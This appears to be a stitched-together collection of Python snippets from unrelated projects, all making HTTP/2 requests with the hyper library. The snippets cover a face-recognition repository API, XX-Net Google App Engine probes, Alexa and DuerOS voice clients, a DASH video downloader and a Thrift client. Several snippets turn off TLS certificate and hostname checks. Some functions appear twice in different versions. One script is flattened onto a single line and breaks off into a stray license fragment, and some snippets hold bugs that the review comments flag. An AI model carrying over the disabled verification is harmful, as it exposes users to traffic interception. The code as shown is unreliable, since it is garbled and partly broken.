def h2_connect(s, ip, port):
    """Open and return a connected hyper HTTP/2 connection to ip:port.

    s -- TLS_ON for TLS (certificate verification disabled), TLS_OFF for
         cleartext. Any other value raises ValueError.
    """
    if s == TLS_ON:
        # NOTE(review): verification is deliberately disabled (CERT_NONE) —
        # fine for testing, unsafe for production traffic.
        ctx = ssl.SSLContext()
        ctx.set_alpn_protocols(['h2'])
        ctx.verify_mode = ssl.CERT_NONE
        conn = hyper.HTTP20Connection(ip, port=port, ssl_context=ctx, enable_push=False)
    elif s == TLS_OFF:
        conn = hyper.HTTP20Connection(ip, port=port, enable_push=False)
    else:
        # FIX: previously fell through with `conn` unbound, producing a
        # confusing NameError; fail loudly instead.
        raise ValueError('unknown TLS mode: {!r}'.format(s))
    conn.connect()
    return conn
def h2_connect(s, ip, port, verify):
    """Open and return a connected hyper HTTP/2 connection to ip:port.

    s      -- truthy to use TLS, falsy for cleartext.
    verify -- when using TLS, whether to verify the server certificate
              against the system trust store.
    """
    if s:
        ctx = ssl.SSLContext()
        ctx.set_alpn_protocols(['h2'])
        if verify:
            ctx.verify_mode = ssl.CERT_REQUIRED
            ctx.load_default_certs()
        else:
            ctx.verify_mode = ssl.CERT_NONE
        conn = hyper.HTTP20Connection(ip, port=port, ssl_context=ctx)
    else:
        # FIX: was `if s == True ... elif s == False`, which left `conn`
        # unbound (NameError) for any non-bool argument; plain truthiness
        # covers every value.
        conn = hyper.HTTP20Connection(ip, port=port)
    conn.connect()
    return conn
def delete_repo(self):
    """Delete the face repository identified by self.repo_id.

    Prints the outcome; on failure also prints the server-reported reason.
    """
    # Repository-deletion API endpoint.
    path = '/face/v1/repositories/{}'.format(self.repo_id)
    conn = hyper.HTTP20Connection(self.url)
    # The request body is empty, so x-kassq-sha256 is left blank.
    header = {
        'x-kassq-sha256': "",
        'Accept': 'application/x.avro',
        'Content-type': 'application/x.avro'
    }
    # Send the request.
    conn.request('DELETE', path, None, header)
    # Fetch the response.
    res = conn.get_response()
    status = res.status
    if status != 200:
        # Deserialize the error message.
        with io.BytesIO(res.read()) as f:
            msg = util.read_avro(util.ERROR_SCHEMA, util.ERROR_SCHEMA, f)
        print('Delete Repo Failed')
        print('Status: {}'.format(status))
        print('Reason: {}'.format(msg['reason']))
    else:
        # FIX: corrected the typo 'Suucess' in the success message.
        print('Delete Repo Success')
        print('Status: {}'.format(status))
    res.close()
def get_records():
    """Query the listing search endpoint once (with a random price filter)
    and return a dict mapping house id -> HomeItem for each listing card."""
    conn = hyper.HTTP20Connection(HomeMaster.request_base)
    body = HomeMaster.__get_request_body(
        price=random.choice(HomeMaster.__get_price_range()))
    hdrs = HomeMaster.__get_request_headers()
    sid = conn.request(method='POST',
                       url=HomeMaster.request_search,
                       headers=hdrs,
                       body=body)
    raw = conn.get_response(sid).read()
    payload = json.loads(raw.decode())
    base_url = HomeMaster.request_scheme + '://' + HomeMaster.request_base
    return {
        card['id']: HomeItem(base_url + card['detailsUrl'])
        for card in payload['payload']['listings']
    }
def check_http2(self, ssl_sock, host):
    # Probe an already-established SSL socket for working HTTP/2 service.
    # Always returns the same ssl_sock; on success sets ssl_sock.ok = True
    # and records the round-trip time (ms) in ssl_sock.request_time.
    # NOTE(review): warn-level log on entry looks like leftover debugging —
    # the sibling checker logs the same message at debug level.
    self.logger.warn("ip:%s use http/2", ssl_sock.ip)
    start_time = time.time()
    try:
        conn = hyper.HTTP20Connection(ssl_sock, host=host, ip=ssl_sock.ip, port=443)
        conn.request('GET', '/')
    except Exception as e:
        # self.logger.exception("xtunnel %r", e)
        self.logger.debug("ip:%s http/1.1:%r", ssl_sock.ip, e)
        return ssl_sock
    try:
        response = conn.get_response()
    except Exception as e:
        self.logger.exception("http2 get response fail:%r", e)
        return ssl_sock
    self.logger.debug("ip:%s http/2", ssl_sock.ip)
    if response.status != 200:
        self.logger.warn("app check ip:%s status:%d", ssl_sock.ip, response.status)
        return ssl_sock
    content = response.read()
    # NOTE(review): read() returns bytes on Python 3; this membership test
    # assumes check_ip_content has a matching type — confirm.
    if self.config.check_ip_content not in content:
        self.logger.warn("app check content:%s", content)
        return ssl_sock
    ssl_sock.ok = True
    time_cost = (time.time() - start_time) * 1000
    ssl_sock.request_time = time_cost
    self.logger.info("check ok, time:%d", time_cost)
    return ssl_sock
def check_xtunnel_http2(ssl_sock, host):
    # Probe an established SSL socket for a working X_Tunnel HTTP/2 endpoint.
    # On success sets ssl_sock.support_xtunnel = True and records the request
    # time (ms) in ssl_sock.request_time; always returns the same ssl_sock.
    start_time = time.time()
    try:
        conn = hyper.HTTP20Connection(ssl_sock, host=host, ip=ssl_sock.ip, port=443)
        conn.request('GET', '/')
    except Exception as e:
        #xlog.exception("xtunnel %r", e)
        xlog.debug("ip:%s http/1.1:%r", ssl_sock.ip, e)
        return ssl_sock
    try:
        response = conn.get_response()
    except Exception as e:
        xlog.exception("http2 get response fail:%r", e)
        return ssl_sock
    xlog.debug("ip:%s http/2", ssl_sock.ip)
    if response.status != 200:
        xlog.warn("app check ip:%s status:%d", ssl_sock.ip, response.status)
        return ssl_sock
    content = response.read()
    # NOTE(review): read() returns bytes on Python 3; `"X_Tunnel OK" not in
    # content` implies a Python 2 (str) runtime — confirm.
    if "X_Tunnel OK" not in content:
        xlog.warn("app check content:%s", content)
        return ssl_sock
    ssl_sock.support_xtunnel = True
    time_cost = (time.time() - start_time) * 1000
    ssl_sock.request_time = time_cost
    xlog.info("check_xtunnel ok, time:%d", time_cost)
    return ssl_sock
def open(self):
    """Create the underlying transport object for the configured backend
    ('hyper', 'httpx', or the default http.client/httplib2 path)."""
    if self.request == 'hyper':
        # Both hyper connection classes share the same constructor shape.
        factory = hyper.HTTP20Connection if self.http2 else hyper.HTTPConnection
        self.__http = factory(self.host, self.port,
                              proxy_host=self.realhost,
                              proxy_port=self.realport,
                              proxy_headers=self.proxy_headers)
    elif self.request == 'httpx':
        base = '%s://%s' % (self.scheme, self.host)
        self.__http = httpx.AsyncClient(base_url=base, http2=self.http2)
    else:
        if self.http2:
            self.__http = httplib2.Http()
        elif self.scheme == 'http':
            self.__http = http_client.HTTPConnection(self.host, self.port)
        elif self.scheme == 'https':
            self.__http = http_client.HTTPSConnection(self.host, self.port)
            if self.using_proxy():
                self.__http.set_tunnel(self.realhost, self.realport,
                                       self.proxy_headers)
def insert(self):
    # Upload every local image as a new face in the repository, advancing
    # self.id per successful insert. A non-200 response aborts the whole
    # process with exit status 2.
    for image in self.images():
        # Face-insertion API endpoint (repository id / face id).
        path = '/face/v1/repositories/{}/faces/{}'.format(
            self.repo_id, self.id)
        # A fresh HTTP/2 connection per image.
        conn = hyper.HTTP20Connection(self.url)
        # Build the Avro datum to serialize.
        request_obj = {
            'face_image': {
                'content': image,
                'content_type': 'jpg'
            },
            'extra_meta': 'insert at {}'.format(
                datetime.datetime.now().strftime('%m/%d/%Y, %H:%M:%S'))
        }
        # Serialize with the face-insert schema.
        with io.BytesIO() as f:
            util.write_avro(util.INSERT_FACE_SCHEMA, f, request_obj)
            body = f.getvalue()
        # The server validates the body against its SHA-256 digest.
        body_hash = hashlib.sha256(body).hexdigest()
        # Request headers.
        header = {
            # x-kassq-sha256 carries the body's sha256 hex digest.
            'x-kassq-sha256': body_hash,
            'Accept': 'application/x.avro',
            'Content-type': 'application/x.avro'
        }
        # Send the data.
        conn.request('PUT', path, body, header)
        # Fetch the response and read its body.
        res = conn.get_response()
        body = res.read()
        status = res.status
        if status != 200:
            # Deserialize the error message.
            with io.BytesIO(body) as f:
                msg = util.read_avro(util.ERROR_SCHEMA, util.ERROR_SCHEMA, f)
            print('Insert Face Failed')
            print('Status: {}'.format(status))
            print('Reason: {}'.format(msg['reason']))
            sys.exit(2)
        else:
            print('Insert face Success')
            print('Face ID: {}'.format(self.id))
            print('Status: {}'.format(status))
            self.id += 1
        res.close()
def __connect(self):
    """(Re)establish the HTTP/2 connection under the connection lock.

    Stores the new connection on self.__conn and returns 0 (kept for
    caller compatibility).
    """
    with self.__conn_lock:
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
        h2_endpoint = self.__generate_endpoint()
        # FIX: use logging's lazy %-style arguments instead of eager string
        # interpolation — same output, no formatting work when DEBUG is off.
        logging.debug('http/2 endpoint:%s', h2_endpoint)
        self.__conn = hyper.HTTP20Connection(h2_endpoint,
                                             port=self.__port,
                                             force_proto=hyper.tls.NPN_PROTOCOL,
                                             ssl_context=ctx)
        return 0
def test_gae_ip2(ip, appid="xxnet-1"):
    # Silent variant of the GAE reachability probe: TLS-connect to `ip`, then
    # try an HTTP/2 request to <appid>.appspot.com/_gh/ and classify the
    # result. Returns False on connect failure; otherwise returns ssl_sock
    # with .support_gae set appropriately.
    try:
        ssl_sock = connect_ssl(ip, timeout=max_timeout)
        get_ssl_cert_domain(ssl_sock)
    except socket.timeout:
        return False
    except Exception as e:
        return False
    ssl_sock.support_gae = False
    if not ssl_sock.h2:
        # No HTTP/2 negotiated: fall back to the HTTP/1.1 goagent check.
        try:
            if not check_goagent(ssl_sock, appid):
                return ssl_sock
            else:
                ssl_sock.support_gae = True
                return ssl_sock
        except Exception as e:
            return False
    try:
        conn = hyper.HTTP20Connection(ssl_sock, host='%s.appspot.com' % appid, ip=ip, port=443)
        conn.request('GET', '/_gh/')
    except Exception as e:
        return ssl_sock
    try:
        response = conn.get_response()
    except Exception as e:
        return ssl_sock
    if response.status == 404:
        return ssl_sock
    if response.status == 503:
        # out of quota — a Google frontend Server header still counts as a
        # usable GAE endpoint.
        server_type = response.headers.get('Server', "")
        if "gws" not in server_type and "Google Frontend" not in server_type and "GFE" not in server_type:
            return ssl_sock
        else:
            ssl_sock.support_gae = True
            return ssl_sock
    if response.status != 200:
        return ssl_sock
    content = response.read()
    if "GoAgent" not in content:
        return ssl_sock
    ssl_sock.support_gae = True
    return ssl_sock
def check_http2(self, ssl_sock, host):
    """Issue one HTTP/2 GET over the given SSL socket.

    Returns the hyper response on success, or False when the request or
    response retrieval fails for any reason.
    """
    self.logger.debug("ip:%s use http/2", ssl_sock.ip_str)
    try:
        conn = hyper.HTTP20Connection(ssl_sock, host=host,
                                      ip=ssl_sock.ip_str, port=443)
        conn.request('GET', self.config.check_ip_path)
        return conn.get_response()
    except Exception as e:
        self.logger.debug("check ip %s http2 get response fail:%r",
                          ssl_sock.ip_str, e)
        return False
def __run(self):
    # Event loop: opens the DuerOS directives downchannel over HTTP/2, then
    # drains the event queue, posting each event as a multipart upload.
    conn = hyper.HTTP20Connection('{}:443'.format(self.__config['host_url']), force_proto='h2')
    headers = {
        "authorization": "Bearer {}".format(self.token)
    }
    if 'dueros-device-id' in self.__config:
        headers['dueros-device-id'] = self.__config['dueros-device-id']
    downchannel_id = conn.request('GET', '/{}/directives'.format(self.__config['api']), headers=headers)
    downchannel_response = conn.get_response(downchannel_id)
    if downchannel_response.status != 200:
        raise ValueError("/directives requests return {}".format(downchannel_response.status))
    # The downchannel is a multipart stream; its boundary comes from the
    # content-type header.
    ctype, pdict = cgi.parse_header(downchannel_response.headers['content-type'][0].decode('utf-8'))
    downchannel_boundary = '--{}'.format(pdict['boundary']).encode('utf-8')
    downchannel = conn.streams[downchannel_id]
    # BUG(review): `io` has no attribute `ByteIO` — this raises
    # AttributeError at runtime; the sibling implementation uses io.BytesIO().
    downchannel_buffer = io.ByteIO()
    eventchannel_boundary = 'baidu-voice-engine'
    # Ping every 4 minutes to keep the connection alive.
    self.__ping_time = datetime.datetime.utcnow() + datetime.timedelta(seconds=240)
    self.event_queue.queue.clear()
    self.system.synchronize_state()
    while not self.done:
        try:
            # NOTE(review): reads from self.event here but clears
            # self.event_queue above — confirm which queue is intended.
            event, listener, attachment = self.event.get(timeout=0.25)
        except queue.Empty:
            event = None
        # Drain pending downchannel frames without blocking.
        while conn._sock.can_read:
            conn._single_read()
        while downchannel.data:
            framebytes = downchannel._read_one_frame()
            self.__read_response(framebytes, downchannel_boundary, downchannel_buffer)
        if event is None:
            self.__ping(conn)
            continue
        headers = {
            ':method': 'POST',
            ':scheme': 'https',
            ':path': '/{}/events'.format(self.__config['api']),
            'authorization': 'Bearer {}'.format(self.token),
            # NOTE(review): this advertises the DOWNchannel boundary (bytes,
            # '--'-prefixed) for the upload body; the sibling implementation
            # uses eventchannel_boundary here — likely a bug.
            'content-type': 'multipart/form-data; boundary={}'.format(downchannel_boundary)
        }
        if 'dueros-device-id' in self.__config:
            headers['dueros-device-id'] = self.__config['dueros-device-id']
        stream_id = conn.putrequest(headers[':method'], headers[':path'])
        default_headers = (':method', ':scheme', ':authority', ':path')
def h2c(self, sp=None, **kwargs):
    """Build (without connecting) a hyper HTTP/2 client connection for the
    service point *sp*; extra kwargs pass through to HTTP20Connection."""
    ctx = self.get_http2_client_context(sp)
    # sp.to is either a (host, port) tuple or a bare host string.
    dest = sp.to
    if isinstance(dest, tuple):
        host, port = dest[0], dest[1]
    else:
        host, port = dest, 0
    return hyper.HTTP20Connection(host, port=port, ssl_context=ctx,
                                  secure=sp.tls, **kwargs)
def create_repo(self):
    """Create the face repository identified by self.repo_id.

    Serializes the request as Avro, attaches the body's SHA-256 digest in
    the headers, and prints the outcome (server-reported reason on failure).
    """
    # Repository-creation API endpoint.
    path = '/face/v1/repositories/{}'.format(self.repo_id)
    # Establish an HTTP/2 connection.
    conn = hyper.HTTP20Connection(self.url)
    # Build the Avro datum to serialize.
    request_obj = {
        'name': 'Repo {}'.format(self.repo_id),
        'extra_meta': 'insert at {}'.format(
            datetime.datetime.now().strftime('%m/%d/%Y, %H:%M:%S'))
    }
    # Serialize with the repository schema.
    with io.BytesIO() as f:
        util.write_avro(util.PUT_REPO_SCHEMA, f, request_obj)
        body = f.getvalue()
    # The server validates the body against this SHA-256 digest.
    body_hash = hashlib.sha256(body).hexdigest()
    header = {
        # x-kassq-sha256 carries the body's sha256 hex digest.
        'x-kassq-sha256': body_hash,
        'Accept': 'application/x.avro',
        'Content-type': 'application/x.avro'
    }
    # Send the request.
    conn.request('PUT', path, body, header)
    # Fetch the response.
    res = conn.get_response()
    status = res.status
    if status != 200:
        # Deserialize the error message.
        with io.BytesIO(res.read()) as f:
            msg = util.read_avro(util.ERROR_SCHEMA, util.ERROR_SCHEMA, f)
        print('Create Repo Failed')
        print('Status: {}'.format(status))
        print('Reason: {}'.format(msg['reason']))
    else:
        # FIX: corrected the typo 'Suucess' in the success message.
        print('Create Repo Success')
        print('Status: {}'.format(status))
    res.close()
def get_mpd(url):
    """ Module to download the MPD from the URL and save it to file"""
    # Returns the local filename on success, or None on any download error.
    # Side effect: rebinds the module-global `connection` for later reuse.
    global connection
    try:
        # TLS context with a client certificate; paths are machine-specific.
        ssl_context = hyper.tls.init_context()
        ssl_context.load_cert_chain(certfile='/mnt/QUIClientServer0/cert.crt', keyfile='/mnt/QUIClientServer0/cert.key')
        ssl_context.load_verify_locations(cafile='/mnt/QUIClientServer0/cert.pem')
        parse_url = urllib.parse.urlparse(url)
        connection = hyper.HTTP20Connection(parse_url.netloc, ssl_context=ssl_context, force_proto='h2', secure=True)
        #parse_url = urlparse.urlparse(url)
        '''
        combine_url = str.join((parse_url.scheme, "://",parse_url.netloc))
        config_dash.LOG.info("DASH URL %s" %combine_url)
        connection = urllib3.connection_from_url(combine_url)
        conn_mpd = connection.request('GET', combine_url)
        config_dash.LOG.info("MPD URL %s" %parse_url.path)
        '''
        #connection = HTTPConnectionPool(parse_url.netloc)
        http2_conn = connection.request('GET', parse_url.path)
        mpd_conn = connection.get_response(http2_conn)
    except hyper.http20.exceptions.HTTP20Error as error:
        config_dash.LOG.error("Unable to download MPD file HTTP2 Error: %s" % error.code)
        return None
    except hyper.http20.exceptions.ConnectionError:
        error_message = "URLError. Unable to reach Server.Check if Server active"
        config_dash.LOG.error(error_message)
        print(error_message)
        return None
    except (IOError, httplib.HTTPException) as e1:
        # NOTE(review): `httplib` is the Python 2 module name — confirm it is
        # imported/aliased for Python 3 (http.client), since urllib.parse
        # above is Python 3 API.
        message = "Unable to , file_identifierdownload MPD file HTTP Error."
        config_dash.LOG.error(message)
        return None
    #mpd_data = mpd_conn.read()
    #connection.close()
    # Save the whole body to a file named after the URL's last path component.
    mpd_file = url.split('/')[-1]
    mpd_file_handle = open(mpd_file, 'wb')
    mpd_file_handle.write(mpd_conn.read())
    mpd_file_handle.close()
    mpd_conn.close()
    #mpd_conn.release_conn()
    #config_dash.LOG.info(mpd_conn.data)
    config_dash.LOG.info("Downloaded the MPD file {}".format(mpd_file))
    return mpd_file
def test_gae_ip2(ip, appid="xxnet-1"):
    """Check whether the GAE app `appid` is reachable on `ip` over HTTP/2.

    Returns True when /_gh/ looks like a working GoAgent deployment (or a
    quota-exhausted Google frontend), else False. Extra logging is emitted
    only when run as a script.
    """
    context = init_context()
    # FIX: the keyword was misspelled `ssl_content`, so the TLS context was
    # silently never applied; HTTP20Connection expects `ssl_context`.
    conn = hyper.HTTP20Connection(host='%s.appspot.com' % appid, ip=ip,
                                  port=443, ssl_context=context)
    try:
        conn.request('GET', '/_gh/')
    except Exception as e:
        xlog.exception("gae %r", e)
        return False
    response = conn.get_response()
    if response.status == 404:
        if __name__ == "__main__":
            xlog.warn("app check %s status:%d", appid, response.status)
        return False
    if response.status == 503:
        # Out of quota: still a success if a Google frontend is serving.
        # FIX: hyper responses expose headers via `.headers.get(...)`, not the
        # http.client-style `.getheader(...)` (matches the sibling probes).
        server_type = response.headers.get('Server', "")
        if "gws" not in server_type and "Google Frontend" not in server_type and "GFE" not in server_type:
            if __name__ == "__main__":
                xlog.warn("503 but server type:%s", server_type)
            return False
        else:
            if __name__ == "__main__":
                xlog.info("503 server type:%s", server_type)
            return True
    if response.status != 200:
        if __name__ == "__main__":
            xlog.warn("app check %s ip:%s status:%d", appid, ip, response.status)
        return False
    content = response.read()
    if "GoAgent" not in content:
        if __name__ == "__main__":
            xlog.warn("app check %s content:%s", appid, content)
        return False
    if __name__ == "__main__":
        xlog.info("check_goagent ok")
    return True
def __init__(self, mode, url, **kwargs):
    """Open a long-lived face-results stream on port 17332 and stash the
    optional save/output settings passed via keyword arguments."""
    self.conn = hyper.HTTP20Connection(
        url, 17332, window_manager=StupidFlowControlManager)
    self.mode = mode
    # Start the streaming GET request.
    self.conn.request('GET', '/face/v1/face_results')
    self.response = self.conn.get_response()
    # The writer schema used for deserialization travels in a response
    # header (possibly split across multiple values — rejoin with commas).
    self.write_schema = b','.join(
        self.response.headers.get('x-kassq-schema')).decode()
    # Optional output settings; absent keys become None.
    for option in ('save_scene', 'save_feature', 'save_face', 'directory'):
        setattr(self, option, kwargs.get(option))
    self.count = 0
def test_gae_ip2(ip, appid="xxnet-1"):
    # Full GAE reachability probe for one IP: TLS-connect, then prefer an
    # HTTP/2 request to <appid>.appspot.com/_gh/; falls back to the HTTP/1.1
    # goagent check when the socket did not negotiate h2.
    # Returns False on hard failure, else ssl_sock with .support_gae set.
    try:
        ssl_sock = connect_ssl(ip, timeout=max_timeout)
        get_ssl_cert_domain(ssl_sock)
    except socket.timeout:
        xlog.warn("connect timeout")
        return False
    except Exception as e:
        xlog.exception("test_gae_ip %s e:%r", ip, e)
        return False
    ssl_sock.support_gae = False
    if not ssl_sock.h2:
        xlog.warn("ip:%s not support http/2", ip)
        # HTTP/1.1 fallback path.
        try:
            if not check_goagent(ssl_sock, appid):
                return ssl_sock
            else:
                ssl_sock.support_gae = True
                return ssl_sock
        except Exception as e:
            xlog.warn("check fail:%r", e)
            return False
    try:
        conn = hyper.HTTP20Connection(ssl_sock, host='%s.appspot.com' % appid, ip=ip, port=443)
        conn.request('GET', '/_gh/')
    except Exception as e:
        #xlog.exception("gae %r", e)
        xlog.debug("ip:%s http/1.1:%r", ip, e)
        return ssl_sock
    try:
        response = conn.get_response()
    except Exception as e:
        xlog.exception("http2 get response fail:%r", e)
        return ssl_sock
    xlog.debug("ip:%s http/2", ip)
    if response.status == 404:
        xlog.warn("app check %s status:%d", appid, response.status)
        return ssl_sock
    if response.status == 503:
        # out of quota — a Google frontend Server header still counts.
        server_type = response.headers.get('Server', "")
        xlog.debug("Server type:%s", server_type)
        if "gws" not in server_type and "Google Frontend" not in server_type and "GFE" not in server_type:
            xlog.warn("503 but server type:%s", server_type)
            return ssl_sock
        else:
            xlog.info("503 server type:%s", server_type)
            ssl_sock.support_gae = True
            return ssl_sock
    if response.status != 200:
        xlog.warn("app check %s ip:%s status:%d", appid, ip, response.status)
        return ssl_sock
    content = response.read()
    if "GoAgent" not in content:
        xlog.warn("app check %s content:%s", appid, content)
        return ssl_sock
    xlog.info("check_goagent ok")
    ssl_sock.support_gae = True
    return ssl_sock
def eventQueueThread(self):
    # Worker thread owning the single HTTP/2 connection to AVS. Opens the
    # directives downchannel, sends SynchronizeState, then pumps
    # self._eventQueue, posting each event (plus optional audio attachment)
    # as one multipart /events request.
    # NOTE(review): indentation reconstructed from an unformatted source —
    # in particular the scope of conn._write_lock below should be confirmed.
    conn = hyper.HTTP20Connection('avs-alexa-na.amazon.com:443', force_proto="h2")
    alexa_tokens = self.get_alexa_tokens()

    def handle_downstream():
        # Open the long-lived GET /directives stream and extract the
        # multipart boundary from its content-type header.
        directives_stream_id = conn.request(
            'GET', '/{}/directives'.format(self._api_version),
            headers={
                'Authorization': 'Bearer %s' % alexa_tokens['access_token']
            })
        self._log.info("Alexa: directives stream is %s", directives_stream_id)
        directives_stream = conn._get_stream(directives_stream_id)
        downchannel = HTTP20Downchannel(directives_stream.getheaders(), directives_stream)
        self._log.info("Alexa: status=%s headers=%s", downchannel.status, downchannel.headers)
        ctype, pdict = cgi.parse_header(
            downchannel.headers['content-type'][0].decode('utf-8'))
        boundary = bytes("--{}".format(pdict['boundary']), 'utf-8')
        self._log.info("Downstream boundary is %s", boundary)
        if downchannel.status != 200:
            self._log.warning(downchannel)
            raise ValueError("/directive requests returned {}".format(
                downchannel.status))
        return directives_stream, boundary

    directives_stream, downstream_boundary = handle_downstream()
    messageId = uuid.uuid4().hex
    # Announce our state; 204 (no content) is the expected reply.
    self._send_event(
        {
            "header": {
                "namespace": "System",
                "name": "SynchronizeState",
                "messageId": messageId
            },
            "payload": {}
        }, expectedStatusCode=204)
    downstream_buffer = io.BytesIO()
    while True:
        #self._log.info("Waiting for event to send to AVS")
        #self._log.info("Connection socket can_read %s", conn._sock.can_read)
        try:
            event, attachment, expectedStatusCode, speakingFinishedEvent = self._eventQueue.get(
                timeout=0.25)
        except queue.Empty:
            event = None
        # TODO check that connection is still functioning and reestablish if needed
        # Drain pending downchannel frames without blocking.
        while directives_stream.data or (conn._sock and conn._sock.can_read):
            # we want to avoid blocking if the data wasn't for stream directives_stream
            if conn._sock and conn._sock.can_read:
                conn._recv_cb()
            while directives_stream.data:
                framebytes = directives_stream._read_one_frame()
                self._log.info(framebytes)
                #self._log.info(framebytes.split(downstream_boundary))
                self._read_response(framebytes, downstream_boundary, downstream_buffer)
        if event is None:
            continue
        metadata = {"context": self._context(), "event": event}
        self._log.debug("Sending to AVS: \n%s", pprint.pformat(metadata))
        boundary = uuid.uuid4().hex
        # NOTE(review): json_part is built but never sent; the metadata is
        # actually sent as json_hdr + a separate json.dumps send below.
        json_part = bytes(
            u'--{}\r\nContent-Disposition: form-data; name="metadata"\r\nContent-Type: application/json; charset=UTF-8\r\n\r\n{}'
            .format(boundary, json.dumps(metadata).encode('utf-8')), 'utf-8')
        json_hdr = bytes(
            u'--{}\r\nContent-Disposition: form-data; name="metadata"\r\nContent-Type: application/json; charset=UTF-8\r\n\r\n'
            .format(boundary), 'utf-8')
        end_part = bytes("\r\n--{}--".format(boundary), 'utf-8')
        headers = {
            ':method': 'POST',
            ':scheme': 'https',
            ':path': '/{}/events'.format(self._api_version),
            'Authorization': 'Bearer %s' % self.get_alexa_tokens()['access_token'],
            'Content-Type': 'multipart/form-data; boundary={}'.format(boundary)
        }
        # Serialize header frames against other writers on this connection.
        with conn._write_lock:
            stream_id = conn.putrequest(headers[':method'], headers[':path'])
            default_headers = (':method', ':scheme', ':authority', ':path')
            for name, value in headers.items():
                is_default = name in default_headers
                conn.putheader(name, value, stream_id, replace=is_default)
            conn.endheaders(final=False, stream_id=stream_id)
        self._log.info("Alexa: Making request using stream %s", stream_id)
        #print(json_part)
        conn.send(json_hdr, final=False, stream_id=stream_id)
        conn.send(json.dumps(metadata).encode('utf-8'), final=False, stream_id=stream_id)
        if attachment:
            # attachment is (name, source): source is either a Queue of audio
            # chunks (live capture) or a file-like object.
            hdr = bytes(
                u'\r\n--{}\r\nContent-Disposition: form-data; name="{}"\r\nContent-Type: application/octet-stream\r\n\r\n{}'
                .format(boundary, attachment[0],
                        json.dumps(metadata).encode('utf-8')), 'utf-8')
            conn.send(hdr, final=False, stream_id=stream_id)
            AVS_AUDIO_CHUNK_PREFERENCE = 320
            #print(speakingFinishedEvent)
            while True:
                #sys.stdout.write("X ")
                #sys.stdout.flush()
                #self._log.info("Getting bytes from queue %s", attachment[1])
                if isinstance(attachment[1], queue.Queue):
                    try:
                        chunk = attachment[1].get(block=True, timeout=1)
                    except queue.Empty as e:
                        chunk = ''
                else:
                    chunk = attachment[1].read(AVS_AUDIO_CHUNK_PREFERENCE)
                #sys.stdout.write(str(len(chunk)))
                #sys.stdout.write(" x")
                #sys.stdout.flush()
                if speakingFinishedEvent and speakingFinishedEvent.is_set():
                    break
                if chunk:
                    #sys.stdout.write("+")
                    #sys.stdout.flush()
                    conn.send(chunk, final=False, stream_id=stream_id)
                elif speakingFinishedEvent is None:
                    # No finish event to wait on and the source is exhausted.
                    #sys.stdout.write("#")
                    #sys.stdout.flush()
                    break
                #sys.stdout.write("=")
                #sys.stdout.flush()
        conn.send(end_part, final=True, stream_id=stream_id)
        self._log.info("Alexa: Made request using stream %s", stream_id)
        resp = conn.get_response(stream_id)
        self._log.info("Alexa HTTP status code: %s", resp.status)
        self._log.debug(resp.headers)
        if expectedStatusCode and resp.status != expectedStatusCode:
            self._log.warning("AVS status code unexpected: %s", resp.status)
            self._log.warning(resp.headers)
            self._log.warning(resp.read())
        if resp.status == 200:
            self._read_response(resp)
import ssl
import hyper
from hyper.tls import init_context

# Build an SSL context that skips certificate and hostname verification, and
# install it both globally on hyper.tls and explicitly on the connection.
# NOTE(review): verification is fully disabled — test/demo use only.
ssl_context = init_context()
hyper.tls._context = ssl_context
hyper.tls._context.check_hostname = False
hyper.tls._context.verify_mode = ssl.CERT_NONE

# One GET against the local HTTP/2 endpoint; print the hyper response object.
conn = hyper.HTTP20Connection('localhost', port=7100, secure=True, ssl_context=ssl_context)
conn.request('GET', '/')
print(conn.get_response())
def connect(self):
    """Create and open an HTTP/2 TLS connection to the configured host,
    keeping it on self.conn for later requests."""
    connection = hyper.HTTP20Connection(self.url.netloc, port=443, secure=True)
    self.conn = connection
    self.conn.connect()
import timeit import threading import hyper import urllib import collections import time t_urlA=0 t_urlB=0 rate_A=0.0 rate_B=0.0 DOWNLOAD_CHUNK=1500 NUM_OF_DOWNLOADS=2 MAX_TRIALS=1 urlA="http://10.10.10.4/www-itec.uni-klu.ac.at/ftp/datasets/DASHDataset2014/BigBuckBunny/2sec/bunny_4219897bps/BigBuckBunny_2s180.m4s" urlB="http://10.10.10.4/www-itec.uni-klu.ac.at/ftp/datasets/DASHDataset2014/BigBuckBunny/2sec/bunny_4219897bps/BigBuckBunny_2s180.m4s" connection = hyper.HTTP20Connection('10.10.10.4', port=80, force_proto='h2', secure=False) time_list=collections.OrderedDict() rate_list=collections.OrderedDict() def get_file(url1): #global t_urlA #global t_urlB #global rate_A #global rate_B parse_url = urllib.parse.urlparse(url1) segment_size=0 t_start1=timeit.default_timer() http2_conn = connection.request('GET',parse_url.path) f_conn=connection.get_response(http2_conn) ''' f_data=f_conn.read(int(DOWNLOAD_CHUNK)) while f_data: #<---
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys

import hyper

# Utility to healthcheck the http2 server. Used when starting the server to
# verify that the server is live before tests begin.
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--server_host', type=str, default='localhost')
    parser.add_argument('--server_port', type=int, default=8080)
    args = parser.parse_args()
    # One probe request: the server is considered healthy iff the response
    # carries a grpc-encoding header. Exit 0 on success, 1 otherwise.
    conn = hyper.HTTP20Connection('%s:%d' % (args.server_host, args.server_port))
    conn.request('POST', '/grpc.testing.TestService/UnaryCall')
    resp = conn.get_response()
    sys.exit(0 if resp.headers.get('grpc-encoding') is not None else 1)
def __init__(self, uri_or_host, port=None, path=None, customThrift=False, request='httplib', http2=False, proxy_host=None, proxy_port=None, proxy_auth=None):
    '''THttpClient supports two different types of constructor parameters.

    THttpClient(host, port, path) - deprecated
    THttpClient(uri)

    Only the second form supports https. `request` selects the HTTP
    backend ('hyper', 'httpx', or the default http.client/httplib2 path);
    when customThrift is false, no transport is created here.
    '''
    if port is not None:
        # Deprecated (host, port, path) form; plain http only.
        warnings.warn(
            'Please use the THttpClient("http://host:port/path") syntax',
            DeprecationWarning,
            stacklevel=2)
        self.host = uri_or_host
        self.port = port
        assert path
        self.path = path
        self.scheme = 'http'
    else:
        # URI form: derive scheme, host, port, path (+query) from the URI.
        parsed = urllib.parse.urlparse(uri_or_host)
        self.scheme = parsed.scheme
        assert self.scheme in ('http', 'https')
        if self.scheme == 'http':
            self.port = parsed.port or http_client.HTTP_PORT
        elif self.scheme == 'https':
            self.port = parsed.port or http_client.HTTPS_PORT
        self.host = parsed.hostname
        self.path = parsed.path
        if parsed.query:
            self.path += '?%s' % parsed.query
